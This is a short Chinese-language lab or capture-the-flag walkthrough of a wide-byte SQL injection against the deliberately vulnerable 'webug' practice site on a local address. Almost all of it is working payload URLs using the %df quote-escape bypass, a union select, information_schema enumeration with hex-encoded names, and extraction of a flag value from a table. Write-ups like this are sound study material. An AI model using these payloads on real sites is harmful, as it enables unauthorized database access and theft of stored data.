url:http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ and 1=1 --+ 不报错
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ order by 2 --+ 不报错
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,2 --+ 回显为2
下面可以查出用户权限,数据库版本,当前数据库等 http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,user() --+
用户权限: root@localhost,数据库版本:5.5.53,当前数据库: webug_width_byte
查看webug_width_byte下的表 hhttp://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘webug_width_byte’ --+ 报错
因为引号被转义了,所以把数据库进行16进制的转换(16进制在mysql数据库中可直接执行,所以不需要转义冒号) http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x77656275675F77696474685F62797465 --+
表为: sqlinjection,storage_xss 查询表:sqlinjection http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x73716C696E6A656374696F6E --+
最后发现,flag值不在webug_width_byte数据库中,哭晕,老老实实去webug数据库中找
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7765627567 --+ webug=0x7765627567
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656E765F6C697374 --+ env_list=0x656E765F6C697374
http://192.168.1.4/control/sqlinject/width_byte_injection.php?id=1%df’ union select 1,envFlag from webug.env_list where id=6 --+ 因为flag值在id=6中
flag值为: dfsadfsadfas
|